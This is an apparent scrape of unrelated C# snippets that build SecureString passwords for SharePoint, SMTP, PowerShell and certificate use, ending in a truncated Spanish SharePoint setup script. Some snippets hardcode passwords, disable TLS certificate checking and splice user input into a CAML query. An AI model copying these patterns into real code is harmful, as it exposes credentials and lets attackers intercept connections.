private void button1_Click(object sender, EventArgs e) { string siteUrl = ""; ClientContext clientContext = new ClientContext(siteUrl); System.Security.SecureString pwd = new System.Security.SecureString(); pwd.AppendChar('p'); pwd.AppendChar('a'); pwd.AppendChar('s'); pwd.AppendChar('s'); pwd.AppendChar('@'); pwd.AppendChar('w'); pwd.AppendChar('o'); pwd.AppendChar('r'); pwd.AppendChar('d'); pwd.AppendChar('1'); clientContext.Credentials = new SharePointOnlineCredentials("*****@*****.**", pwd); Web site = clientContext.Web; clientContext.Load(site); clientContext.ExecuteQuery(); SP.List oList = clientContext.Web.Lists.GetByTitle("Migration Tasks"); CamlQuery query; string sitesText = "" + textBox1.Text; sitesText = sitesText.Replace("\r", ""); sitesText = sitesText.Replace("\n", ","); string[] sites = null; if (sitesText.Length > 0) { sites = sitesText.Split(','); for (int i = 0; i < sites.Length; i++) { if (sites[i].Trim().Length > 0) { query = new CamlQuery(); query.ViewXml = "<View><Query><Where><Contains><FieldRef Name='ContentSource'/><Value Type='Text'>" + sites[i] + "</Value></Contains></Where></Query></View>"; ListItemCollection collListItem = oList.GetItems(query); clientContext.Load(collListItem); clientContext.ExecuteQuery(); if (collListItem.Count == 1) { ListItem oListItem = collListItem[0]; //listBox1.DataSource = collListItem; textBox3.Text += oListItem["Title"].ToString() + @" "; oListItem["MigrationStatus"] = textBox2.Text; oListItem.Update(); clientContext.ExecuteQuery(); } } } } }
protected void SendMail() { SmtpClient client = new System.Net.Mail.SmtpClient(); //Password of your gmail address System.Security.SecureString password = new System.Security.SecureString(); password.AppendChar('p'); password.AppendChar('o'); password.AppendChar('h'); password.AppendChar('u'); password.AppendChar('t'); password.AppendChar('a'); password.AppendChar('k'); password.AppendChar('a'); password.AppendChar('w'); password.AppendChar('a'); // Set the e-mail destinations. string from = "*****@*****.**"; string to = "*****@*****.**"; client.Host = ""; client.Port = 587; client.EnableSsl = true; client.DeliveryMethod = System.Net.Mail.SmtpDeliveryMethod.Network; client.Credentials = new NetworkCredential(from, password); ServicePointManager.ServerCertificateValidationCallback = delegate(object s, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors) { return true; }; client.Timeout = 20000; // Specify the message content. MailMessage mail = new MailMessage(); //From address to send email mail.From = new MailAddress(from); //To address to send email mail.To.Add(to); mail.Body = MakeEmailBody(); mail.BodyEncoding = System.Text.Encoding.UTF8; mail.Subject = "Inquiry from website"; mail.SubjectEncoding = System.Text.Encoding.UTF8; // Passing values to smtp object client.Send(mail); // Clean up. mail.Dispose(); }
/// <summary> /// Create a new self signed certificate /// </summary> /// <param name="x500"></param> /// <param name="startTime"></param> /// <param name="endTime"></param> /// <param name="insecurePassword"></param> /// <returns></returns> public static byte[] CreateSelfSignCertificatePfx(string x500, DateTime startTime, DateTime endTime, string insecurePassword) { byte[] pfxData; SecureString password = null; try { if (!string.IsNullOrEmpty(insecurePassword)) { password = new SecureString(); foreach (char ch in insecurePassword) { password.AppendChar(ch); } password.MakeReadOnly(); } pfxData = CreateSelfSignCertificatePfx( x500, startTime, endTime, password); } finally { if (password != null) { password.Dispose(); } } return pfxData; }
void kedofriends(bool retry) { using (jaka jaka = new jaka()) { jaka.Show(); if (retry) { jaka.PasswordWasWrong(); npkji.Flash(jaka, 3); } // wait for slow jaka while (jaka.Visible) { Application.DoEvents(); Thread.Sleep(1); } // jaka stinx if (jaka.WasCancelled || jaka.Username.Length == 0 || jaka.Password.Length == 0) Environment.Exit(0); username = jaka.Username; type = jaka.PlanType; password = new System.Security.SecureString(); foreach (var x in jaka.Password) password.AppendChar(x); password.MakeReadOnly(); } }
public override object EditValue(ITypeDescriptorContext context, IServiceProvider provider, object value) { if (context == null || context.Instance == null) { return base.EditValue(context, provider, value); } else { value = null; NetworkCredential creds = GetCredential(); if (creds != null) { System.Security.SecureString pwd = new System.Security.SecureString(); foreach(var c in creds.Password) { pwd.AppendChar(c); } PSCredential rtncrds = new PSCredential(creds.UserName, pwd); creds = null; pwd = null; GC.Collect(); value = rtncrds; } return value; } }
public static System.Security.SecureString PasswordAsSecureString() { System.Security.SecureString ss = new System.Security.SecureString(); foreach (char c in PasswordAsString()) ss.AppendChar(c); return ss; }
static System.Security.SecureString getPassword() { System.Security.SecureString pwd = new System.Security.SecureString(); while (true) { System.ConsoleKeyInfo i = System.Console.ReadKey(true); if (i.Key == System.ConsoleKey.Enter) { System.Console.WriteLine(); break; } else if (i.Key == System.ConsoleKey.Backspace) { if (pwd.Length > 0) { pwd.RemoveAt(pwd.Length - 1); System.Console.Write("\b \b"); } } else { pwd.AppendChar(i.KeyChar); System.Console.Write("*"); } } pwd.MakeReadOnly(); return pwd; }
public static PSCredential GetCredential(string userName, string password) { var securePassword = new System.Security.SecureString(); foreach (var c in password) securePassword.AppendChar(c); return new PSCredential(userName, securePassword); }
/// <summary> /// Converts a string into a SecureString /// </summary> public static System.Security.SecureString ToSecureString(this String source) { var secureString = new System.Security.SecureString(); foreach (Char c in source) secureString.AppendChar(c); return secureString; }
public static System.Security.SecureString ToSecureString(string input) { var secure = new System.Security.SecureString(); foreach (var c in input) { secure.AppendChar(c); } secure.MakeReadOnly(); return secure; }
public void Send(string to, string subject, string body) { System.Net.NetworkCredential credential; System.Security.SecureString secStr = new System.Security.SecureString(); foreach (var c in GmailEncryptedPassword.Decrypt()) secStr.AppendChar(c); credential = new System.Net.NetworkCredential(GmailUser, secStr); CSA.Common.SendMail sm = new Common.SendMail(GmailSmtpAddress, GmailSmtpPort, credential); sm.Send(to, subject, body); }
private string GetSelloFromDerKey(string cadenaOriginal) { System.Security.Cryptography.SHA1CryptoServiceProvider sha1 = new System.Security.Cryptography.SHA1CryptoServiceProvider(); System.Security.SecureString passwordSeguro = new System.Security.SecureString(); passwordSeguro.Clear(); foreach (char c in this.PrivateKeyContrasena.ToCharArray()) passwordSeguro.AppendChar(c); var rsaCryptoIPT = JavaScience.opensslkey.DecodeEncryptedPrivateKeyInfo(this.PrivateKeyDER, passwordSeguro); System.Text.UTF8Encoding encoder = new System.Text.UTF8Encoding(); byte[] binData = encoder.GetBytes(cadenaOriginal); byte[] binSignature = rsaCryptoIPT.SignData(binData, sha1); string sello = Convert.ToBase64String(binSignature); return sello; }
public AzureCache() { var token = new System.Security.SecureString(); foreach (var c in AuthenticationToken.ToCharArray()) { token.AppendChar(c); } var securityProperties = new DataCacheSecurity(token); var factory = new DataCacheFactory(new DataCacheFactoryConfiguration() { SecurityProperties = securityProperties, Servers = new List<DataCacheServerEndpoint> { new DataCacheServerEndpoint(CacheHost, CachePort) } }); this._cacheClient = factory.GetDefaultCache(); }
public object Decrypt(byte[] certificate, string password, byte[] encryptedBytes) { byte[] decryptedBytes; // load the certificate and decrypt the specified data using (var ss = new System.Security.SecureString()) { foreach (var keyChar in password.ToCharArray()) ss.AppendChar(keyChar); // load the password protected certificate file var cert = new X509Certificate2(certificate, ss); using (RSACryptoServiceProvider rsa = (RSACryptoServiceProvider)cert.PrivateKey) { decryptedBytes = rsa.Decrypt(encryptedBytes, true); } } object returnObj = Serializer.DeserializeFromByteArray(decryptedBytes); return returnObj; }
/// <summary> /// Reads a password from the standard input stream without printing the password characters to the screen. /// </summary> /// <remarks>Pressing the backspace key does work while entering the password.</remarks> /// <returns>A <see cref="System.Security.SecureString"/> instance containing the password that has been entered into the standard input stream.</returns> public static System.Security.SecureString GetSecurePassword() { System.Security.SecureString pwd = new System.Security.SecureString(); while (true) { ConsoleKeyInfo i = Console.ReadKey(true); if (i.Key == ConsoleKey.Enter) { break; } else if (i.Key == ConsoleKey.Backspace) { pwd.RemoveAt(pwd.Length - 1); //Console.Write("\b \b"); } else { pwd.AppendChar(i.KeyChar); //Console.Write("*"); } } return pwd; }
public void TestSecureStringSaving() { System.Security.SecureString sT = new System.Security.SecureString(); string secureStringTest = "This is a SecureString test"; for (int t = 0; t < secureStringTest.Length; t++) { sT.AppendChar(secureStringTest[t]); } // create a second. System.Security.SecureString sT2 = new System.Security.SecureString(); string secureStringTest2 = "This is a SecureString test"; for (int t = 0; t < secureStringTest2.Length; t++) { sT2.AppendChar(secureStringTest2[t]); } // check sT and sT2 for equality. MessageBox.Show((sT2 == sT).ToString()); Properties.Settings.Default.secureTest = sT; Properties.Settings.Default.Save(); // check sT and Properties.Settings.Default.secureTest for equality. MessageBox.Show((sT == Properties.Settings.Default.secureTest).ToString()); Properties.Settings.Default.Reload(); // check sT and Properties.Settings.Default.secureTest for equality. // after reloading. MessageBox.Show((sT == Properties.Settings.Default.secureTest).ToString()); // check the length of the two objects after reloading. MessageBox.Show((sT.Length == Properties.Settings.Default.secureTest.Length).ToString()); }
static void Main(string[] args) { string usrUser = Properties.Settings.Default.User; string usrInPass = Properties.Settings.Default.Pass; string usrURL = Properties.Settings.Default.URL; System.Security.SecureString usrPass = new System.Security.SecureString(); foreach (char chr in usrInPass.ToCharArray()) { usrPass.AppendChar(chr); } using (ClientContext ctx = new ClientContext(usrURL)) { ctx.Credentials = new SharePointOnlineCredentials(usrUser, usrPass); Web web = ctx.Web; ctx.Load(web); ctx.ExecuteQuery(); CrearLista creacion = new CrearLista("Categoria", "categoria", "Almacena los datos de las categorías en los que agrupan los platos.", (int)ListTemplateType.GenericList, ctx); creacion.Crear(); creacion.CambiarDisplay(); List listaCategoria = creacion.Ref; creacion = new CrearLista("Ingredientes", "ingredientes", "Almacena los datos de los ingredientes para las ensaladas.", (int)ListTemplateType.GenericList, ctx); creacion.Crear(); creacion.CambiarDisplay(); List listaIngredientes = creacion.Ref; creacion = new CrearLista("Guarnicion", "guarnicion", "Almacena los datos de las guarniciones que acompañan los platos.", (int)ListTemplateType.GenericList, ctx); creacion.Crear(); creacion.CambiarDisplay(); List listaGuarnicion = creacion.Ref; creacion = new CrearLista("Carta", "carta", "Almacena los datos de los platos establecido en el menú.", (int)ListTemplateType.GenericList, ctx); creacion.Crear(); creacion.CambiarDisplay(); List listaCarta = creacion.Ref; creacion = new CrearLista("Pedidos", "pedidos", "Almacena los datos de los pedidos.", (int)ListTemplateType.GenericList, ctx); creacion.Crear(); creacion.CambiarDisplay(); List listaPedido = creacion.Ref; creacion = new CrearLista("Pedido Detalle", "pedidodetalle", "Almacena el detalle de los pedidos.", (int)ListTemplateType.GenericList, ctx); creacion.Crear(); creacion.CambiarDisplay(); List listaPedidoDetalle = creacion.Ref; //Creacion de Fields Console.ForegroundColor = ConsoleColor.Yellow; Console.WriteLine("-- CREANDO CAMPOS --"); Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("Responsabilidad de FEDE y CAROs."); Console.ForegroundColor = ConsoleColor.Yellow; int cntF = 0; //Categoría Guarnicion Console.WriteLine(" Definiendo Campos de: {0} ", "Categoría"); listaCategoria.Fields.AddFieldAsXml("<Field ID='{F266F118-3B06-48EE-9DF4-3E3FD0CC94CA}' " + " DisplayName='catGuarnicion' " + " Name='catGuarnicion' " + " Type ='LookupMulti' " + " List='{" + listaGuarnicion.Id + "}' " + " ShowField='Title' " + " Mult='TRUE' />", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Guarnicion"); try { ctx.ExecuteQuery(); } catch (Exception ex) { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine(" - EXISTENTE"); Console.ForegroundColor = ConsoleColor.Green; } Field Campo = listaCategoria.Fields.GetByInternalNameOrTitle("catGuarnicion"); Campo.Title = "Guarnición"; Campo.Update(); cntF++; ctx.ExecuteQuery(); //Ingredientes Disponibilidad -------------------------------------------------------------------------------------------- Console.WriteLine(" Definiendo Campos de: {0} ", "Ingredientes"); listaIngredientes.Fields.AddFieldAsXml("<Field ID='{5BF90F4C-E9DA-47AB-8863-19B7B27DBC95}' " + " DisplayName='ingDisponibilidad' " + " Name='ingDisponibilidad' " + " Type='Boolean' " + " Required='TRUE'>" + " <Default>1</Default>" + " </Field>", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Disponibilidad"); listaIngredientes.Update(); try { ctx.ExecuteQuery(); } catch (Exception ex) { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine(" - EXISTENTE"); Console.ForegroundColor = ConsoleColor.Green; } Campo = listaIngredientes.Fields.GetByInternalNameOrTitle("ingDisponibilidad"); Campo.Title = "Disponibilidad"; Campo.Update(); cntF++; ctx.ExecuteQuery(); //Guarnicion Disponibilidad -------------------------------------------------------------------------------------------- Console.WriteLine(" Definiendo Campos de: {0} ", "Guarnición"); listaGuarnicion.Fields.AddFieldAsXml("<Field ID='{65C95CD6-DE9D-4104-81E6-906DA253ACC6}' " + " DisplayName='guaDisponibilidad' " + " Name='guaDisponibilidad' " + " Type ='Boolean' " + " Required='TRUE'>" + " <Default>1</Default>" + " </Field>", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Disponibilidad"); listaGuarnicion.Update(); try { ctx.ExecuteQuery(); } catch (Exception ex) { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine(" -EXISTENTE"); Console.ForegroundColor = ConsoleColor.Green; } Campo = listaGuarnicion.Fields.GetByInternalNameOrTitle("guaDisponibilidad"); Campo.Title = "Disponibilidad"; Campo.Update(); cntF++; ctx.ExecuteQuery(); //Carta Categoria -------------------------------------------------------------------------------------------- Console.WriteLine(" Definiendo Campos de: {0} ", "Carta"); listaCarta.Fields.AddFieldAsXml("<Field ID='{553BCE71-1FB0-441A-9A25-CED4EAA24C47}' " + " DisplayName='carCategoria' " + " Name='carCategoria' " + " Type='Lookup' " + " List='{" + listaCategoria.Id + "}' " + " ShowField='Title' " + " Indexed='TRUE' " + " Required='TRUE' />", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Categoria"); //Carta Disponibilidad listaCarta.Fields.AddFieldAsXml("<Field ID='{7696EE45-CBF1-4541-88B7-BB8B0EAC52DD}' " + " DisplayName='carDisponibilidad' " + " Name='carDisponibilidad' " + " Type ='Boolean' " + " Required='TRUE'>" + " <Default>1</Default>" + " </Field>", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Disponibilidad"); //Carta Precio listaCarta.Fields.AddFieldAsXml("<Field ID='{891E690D-94EF-416F-BE34-B6D21D145BB4}' " + " DisplayName='carPrecio' " + " Name='carPrecio' " + " Type ='Currency' " + " LCID= '11274'" + " Min= '0' " + " Required='TRUE'/>", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Precio"); //Carta Descuento listaCarta.Fields.AddFieldAsXml("<Field ID='{ED828D92-0444-457B-A4E5-0652BBC7AB6B}' " + " DisplayName='carDescuento' " + " Name='carDescuento' " + " Type ='Number' " + " Min= '0' " + " Percentage='TRUE'" + " Required='TRUE'>" + " <Default>0</Default>" + " </Field>", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Descuento"); //Carta Total listaCarta.Fields.AddFieldAsXml("<Field ID='{428F1064-C8AA-491F-AEE3-B3FD6146B9DA}'" + " DisplayName='carTotal' " + " Name='carTotal' " + " Type ='Calculated' " + " LCID= '11274'" + " Min= '0' " + " Required='TRUE' " + " ResultType='Currency' >" + "<Formula> =[carDescuento]*[carPrecio]</Formula>" + "<FieldRefs>" + "<FieldRef Name='carPrecio' />" + "<FieldRef Name='carDescuento' />" + "</FieldRefs>" + " </Field>", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Total"); listaCarta.Update(); try { ctx.ExecuteQuery(); } catch (Exception ex) { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine(" -EXISTENTE"); Console.ForegroundColor = ConsoleColor.Green; } Field[] CamposCarta = new Field[5]; CamposCarta[0] = listaCarta.Fields.GetByInternalNameOrTitle("carCategoria"); CamposCarta[0].Title = "Categoría"; CamposCarta[1] = listaCarta.Fields.GetByInternalNameOrTitle("carDisponibilidad"); CamposCarta[1].Title = "Disponibilidad"; CamposCarta[2] = listaCarta.Fields.GetByInternalNameOrTitle("carPrecio"); CamposCarta[2].Title = "Precio"; CamposCarta[3] = listaCarta.Fields.GetByInternalNameOrTitle("carDescuento"); CamposCarta[3].Title = "Descuento"; CamposCarta[4] = listaCarta.Fields.GetByInternalNameOrTitle("carTotal"); CamposCarta[4].Title = "Total"; foreach (Field c in CamposCarta) { c.Update(); cntF++; } ctx.ExecuteQuery(); //Pedidos Observaciones -------------------------------------------------------------------------------------------- Console.WriteLine(" Definiendo Campos de: {0} ", "Pedidos"); listaPedido.Fields.AddFieldAsXml("<Field DisplayName='pedObsevaciones' " + " ID='{A80C1348-14CE-4441-8259-E5D4E18DC93A}' " + " Name='pedObsevaciones' " + " Type ='Note' />", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Observaciones"); //Pedidos Estado listaPedido.Fields.AddFieldAsXml("<Field DisplayName='pedEstado' " + " ID='{72B7F7D5-253A-4957-A6BE-14DFC6ABA116}' " + " Name='pedEstado' " + " Type ='Choice' >" + " <CHOICES>" + "<CHOICE>Pendiente</CHOICE>" + "<CHOICE>Cancelado</CHOICE>" + "<CHOICE>Listo</CHOICE>" + "<CHOICE>Finalizado</CHOICE>" + " </CHOICES>" + " <Default>Pendiente</Default>" + " </Field>", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Estado"); //Pedidos Ubicación listaPedido.Fields.AddFieldAsXml("<Field DisplayName='pedUbicacion' " + " ID='{81C5AFE3-5D85-4E85-8E76-62C3D612D610}' " + " Name='pedUbicacion' " + " Type ='Text' />", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Ubicación"); //Pedidos SubTotal listaPedido.Fields.AddFieldAsXml("<Field DisplayName='pedSubTotal' " + " ID='{F9883EA5-03FC-460A-8A61-7FAD0219BF08}' " + " Name='pedSubTotal' " + " Type ='Currency' " + " LCID= '11274'" + " Min= '0' />", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "SubTotal"); //Pedidos Historial Estado listaPedido.Fields.AddFieldAsXml("<Field DisplayName='pedHistorialEstado' " + " ID='{B4A1021F-6256-4F06-86EC-C0ED1EB38B04}' " + " Name='pedHistorialEstado' " + " Type ='Note' />", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Historial Estado"); //Pedido Horario listaPedido.Fields.AddFieldAsXml("<Field DisplayName='pedHorario' " + " ID='{A2782181-6653-49A3-B756-7A39608A5AFF}' " + " Name='pedHorario' " + " Type ='DateTime' />", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Horario"); //Pedido Bonificaciones listaPedido.Fields.AddFieldAsXml("<Field DisplayName='pedBonificaciones' " + " ID='{B652D0D1-D682-4AD5-9239-CFA7203DA4B5}' " + " Name='pedBonificaciones' " + " Type ='Currency' " + " LCID= '11274'" + " Min= '0' />", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Bonificaciones"); //Pedido Total listaPedido.Fields.AddFieldAsXml("<Field DisplayName='pedTotal' " + " ID='{2067DC44-00C2-433D-945D-E01C01DFD808}' " + " Name='pedTotal' " + " Type ='Currency' " + " LCID= '11274'" + " Min= '0' />", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Total"); listaPedido.Update(); try { ctx.ExecuteQuery(); } catch (Exception ex) { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine(" -EXISTENTE"); Console.ForegroundColor = ConsoleColor.Green; } Field[] CamposPedido = new Field[8]; CamposPedido[0] = listaPedido.Fields.GetByInternalNameOrTitle("pedObservaciones"); CamposPedido[0].Title = "Observaciones"; CamposPedido[1] = listaPedido.Fields.GetByInternalNameOrTitle("pedEstado"); CamposPedido[1].Title = "Estado"; CamposPedido[2] = listaPedido.Fields.GetByInternalNameOrTitle("pedUbicacion"); CamposPedido[2].Title = "Ubicación"; CamposPedido[3] = listaPedido.Fields.GetByInternalNameOrTitle("pedSubTotal"); CamposPedido[3].Title = "SubTotal"; CamposPedido[4] = listaPedido.Fields.GetByInternalNameOrTitle("pedHistorialEstado"); CamposPedido[4].Title = "Historial Estado"; CamposPedido[5] = listaPedido.Fields.GetByInternalNameOrTitle("pedHorario"); CamposPedido[5].Title = "Horario"; CamposPedido[6] = listaPedido.Fields.GetByInternalNameOrTitle("pedBonificaciones"); CamposPedido[6].Title = "Bonificaciones"; CamposPedido[7] = listaPedido.Fields.GetByInternalNameOrTitle("pedTotal"); CamposPedido[7].Title = "Total"; foreach (Field c in CamposPedido) { c.Update(); cntF++; } ctx.ExecuteQuery(); //Pedido Detalle -------------------------------------------------------------------------------------------- Console.WriteLine(" Definiendo Campos de: {0} ", "Pedido Detalle"); //Pedido Detalle cubiertos listaPedidoDetalle.Fields.AddFieldAsXml("<Field DisplayName='peddtCubiertos' " + " ID='{0102837A-CB07-4C4F-9106-669C5BF92D79}' " + " Name='peddtCubiertos' " + " Type ='Boolean' >" + " <Default>1</Default>" + " </Field>", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Cubiertos"); //Pedido Detalle aderezos listaPedidoDetalle.Fields.AddFieldAsXml("<Field DisplayName='peddtAderezos' " + " ID='{CC120D44-8FF3-495A-9D13-208EDC5571B7}' " + " Name='peddtAderezos' " + " Type ='Choice' >" + " <CHOICES>" + "<CHOICE>Ninguno</CHOICE>" + "<CHOICE>Mayonesa</CHOICE>" + "<CHOICE>Ketechup</CHOICE>" + "<CHOICE>Mostaza</CHOICE>" + "<CHOICE>Sal</CHOICE>" + "<CHOICE>Queso</CHOICE>" + " </CHOICES>" + " <Default>Ninguno</Default>" + " </Field>", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Aderezos"); listaPedidoDetalle.Update(); //Pedido Detalle cantidad listaPedidoDetalle.Fields.AddFieldAsXml("<Field DisplayName='peddtCantidad' " + " ID='{AFD709FC-AF19-4EB1-A6A6-FD3F6E2B217A}' " + " Name='peddtCantidad' " + " Type ='Number'" + " Min= '1' />", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Cantidad"); //Pedido Detalle pan listaPedidoDetalle.Fields.AddFieldAsXml("<Field DisplayName='peddtPan' " + " ID='{B16E25DB-0134-4ECD-A09C-1DC02CA0A56B}' " + " Name='peddtPan' " + " Type ='Boolean' />", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Pan"); listaPedidoDetalle.Update(); //Pedido Detalle Observaciones listaPedidoDetalle.Fields.AddFieldAsXml("<Field DisplayName='peddtObservaciones' " + " ID='{9C446E32-69B3-4B8F-AD53-1E1A2648BC5C}' " + " Name='peddtObservaciones' " + " Type ='Note' />", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Observaciones"); listaPedidoDetalle.Update(); //Pedido Detalle usuario listaPedidoDetalle.Fields.AddFieldAsXml("<Field DisplayName='peddtUsuario' " + " ID='{377B04EB-46F5-4A47-ABD8-C61EDD7169E4}' " + " Name='peddtUsuario' " + " Type ='User' " + " Required='TRUE' />", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Usuario"); listaPedidoDetalle.Update(); //Pedido Detalle Id Pedido listaPedidoDetalle.Fields.AddFieldAsXml("<Field DisplayName='peddtIDPedido' " + " ID='{F46E68EA-5F70-4023-9757-602DA9183652}' " + " Name='peddtIDPedido' " + " Type ='Number' />", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Id Pedido"); listaPedidoDetalle.Update(); //Pedido Detalle ID Guarnicion listaPedidoDetalle.Fields.AddFieldAsXml("<Field DisplayName='peddtIDGuarnicion' " + " ID='{E7CCE4F2-099F-4E71-BDD1-3704A804D29D}' " + " Name='peddtIDGuarnicion' " + " Type ='Number' />", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Id Guarnicion"); listaPedidoDetalle.Update(); //Pedido Detalle ID carta listaPedidoDetalle.Fields.AddFieldAsXml("<Field DisplayName='peddtIDCarta' " + " ID='{CE032EC2-8E07-4353-9CBE-7D5B3E12E42A}' " + " Name='peddtIDCarta' " + " Type ='Number' />", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Id Carta"); listaPedidoDetalle.Update(); //Pedido Detalle Tipo Guarnicion listaPedidoDetalle.Fields.AddFieldAsXml("<Field DisplayName='peddtTituloGuarnicion' " + " ID='{DEC90067-9289-4A9D-9D21-75E497974FEE}' " + " Name='peddtTituloGuarnicion' " + " Type ='Text' />", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Tipo Guarnicion"); listaPedidoDetalle.Update(); //Pedido Detalle SubTotal listaPedidoDetalle.Fields.AddFieldAsXml("<Field DisplayName='peddtSubTotal' " + " ID='{5CB1ED9A-720B-4B74-AF3D-7B1D0FC7F999}' " + " Name='peddtSubTotal' " + " Type ='Currency' " + " LCID= '11274'" + " Min= '0' />", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Sub Total"); //Pedido Detalle Bonificaciones listaPedidoDetalle.Fields.AddFieldAsXml("<Field DisplayName='peddtBonificaciones' " + " ID='{F062E586-B859-4332-8B2F-9C4ECF2343DE}' " + " Name='peddtTituloGuarnicion' " + " Type ='Currency' " + " LCID= '11274'/>", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Bonificaciones"); listaPedidoDetalle.Update(); //Pedido Detalle Total listaPedidoDetalle.Fields.AddFieldAsXml("<Field DisplayName='peddtTotal' " + " ID='{A4A86576-1732-4DB9-9A02-45610E527A02}' " + " Name='peddtTituloGuarnicion' " + " Type ='Currency' " + " LCID= '11274'" + " Min= '0' />", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Total "); listaPedidoDetalle.Update(); //Pedido Detalle Ingredientes listaPedidoDetalle.Fields.AddFieldAsXml("<Field DisplayName='peddtIngredientes' " + " ID='{E981CE78-9608-43CA-AB9C-93F6FFAC7100}' " + " Name='peddtIngredidentes' " + " Type ='Note' />", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Ingredientes"); listaPedidoDetalle.Update(); ////Pedido Detalle Categoria ERROR listaPedidoDetalle.Fields.AddFieldAsXml("<Field DisplayName='peddtCategoria' " + " ID='{2C9F202A-3934-48B4-9230-CAD91D9122C1}' " + " Name='peddtCategoria' " + " Type ='Text'/> ", true, AddFieldOptions.DefaultValue); Console.WriteLine(" -{0} ", "Categoria "); listaPedidoDetalle.Update(); try { ctx.ExecuteQuery(); } catch (Exception ex) { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine(" - EXISTENTE"); Console.ForegroundColor = ConsoleColor.Green; } Field[] CamposPedidoD = new Field[15]; CamposPedidoD[0] = listaPedidoDetalle.Fields.GetByInternalNameOrTitle("peddtCubiertos"); CamposPedidoD[0].Title = "Cubiertos"; CamposPedidoD[1] = listaPedidoDetalle.Fields.GetByInternalNameOrTitle("peddtAderezos"); CamposPedidoD[1].Title = "Aderezos"; CamposPedidoD[2] = listaPedidoDetalle.Fields.GetByInternalNameOrTitle("peddtCantidad"); CamposPedidoD[2].Title = "Cantidad"; CamposPedidoD[3] = listaPedidoDetalle.Fields.GetByInternalNameOrTitle("peddtPan"); CamposPedidoD[3].Title = "Pan"; CamposPedidoD[4] = listaPedidoDetalle.Fields.GetByInternalNameOrTitle("peddtObservaciones"); CamposPedidoD[4].Title = "Observaciones"; CamposPedidoD[5] = listaPedidoDetalle.Fields.GetByInternalNameOrTitle("peddtUsuario"); CamposPedidoD[5].Title = "Usuario"; CamposPedidoD[6] = listaPedidoDetalle.Fields.GetByInternalNameOrTitle("peddtIDPedido"); CamposPedidoD[6].Title = "ID Pedido"; CamposPedidoD[7] = listaPedidoDetalle.Fields.GetByInternalNameOrTitle("peddtIDGuarnicion"); CamposPedidoD[7].Title = "ID Guarnición"; CamposPedidoD[8] = listaPedidoDetalle.Fields.GetByInternalNameOrTitle("peddtIDCarta"); CamposPedidoD[8].Title = "ID Carta"; CamposPedidoD[9] = listaPedidoDetalle.Fields.GetByInternalNameOrTitle("peddtTituloGuarnicion"); CamposPedidoD[9].Title = "Titulo Guarnición"; CamposPedidoD[10] = listaPedidoDetalle.Fields.GetByInternalNameOrTitle("peddtSubTotal"); CamposPedidoD[10].Title = "SubTotal"; CamposPedidoD[11] = listaPedidoDetalle.Fields.GetByInternalNameOrTitle("peddtBonificaciones"); CamposPedidoD[11].Title = "Bonificaciones"; CamposPedidoD[12] = listaPedidoDetalle.Fields.GetByInternalNameOrTitle("peddtTotal"); CamposPedidoD[12].Title = "Total"; CamposPedidoD[13] = listaPedidoDetalle.Fields.GetByInternalNameOrTitle("peddtIngredientes"); CamposPedidoD[13].Title = "Ingredientes"; CamposPedidoD[14] = listaPedidoDetalle.Fields.GetByInternalNameOrTitle("peddtCategoria"); CamposPedidoD[14].Title = "Categoría"; foreach (Field c in CamposPedidoD) { c.Update(); cntF++; } ctx.ExecuteQuery(); Console.ForegroundColor = ConsoleColor.Green; Console.WriteLine("------- FIELDS CREADAS --------"); Console.WriteLine("Cantidad de Fields configurados: " + cntF); Console.ResetColor(); CrearPermisos PermisBuffet = new CrearPermisos("Buffet", "Buffet", usrUser, ctx); PermisBuffet.CrearGrupo(); CrearPermisos PermisIntegrantes = new CrearPermisos("Integrantes", "Integrantes", usrUser, ctx); PermisIntegrantes.CrearGrupo(); CrearPermisos PermisEmpresa = new CrearPermisos("Empresa", "Empresa", usrUser, ctx); PermisEmpresa.CrearGrupo(); CrearPermisos.CrearNivel(ctx); CrearPermisos.AsignarPermis(ctx); CrearPermisoLista.AsignarPermiso(ctx); ActivarFeature.Activar(ctx); } Console.ForegroundColor = ConsoleColor.White; Console.WriteLine("\n ###### FIN ###### "); Console.WriteLine("\n .-o=o-."); Console.WriteLine(" , /=o=o=o=\\ .--."); Console.WriteLine(" _|\\|=o=O=o=O=| \\"); Console.WriteLine(" __.' 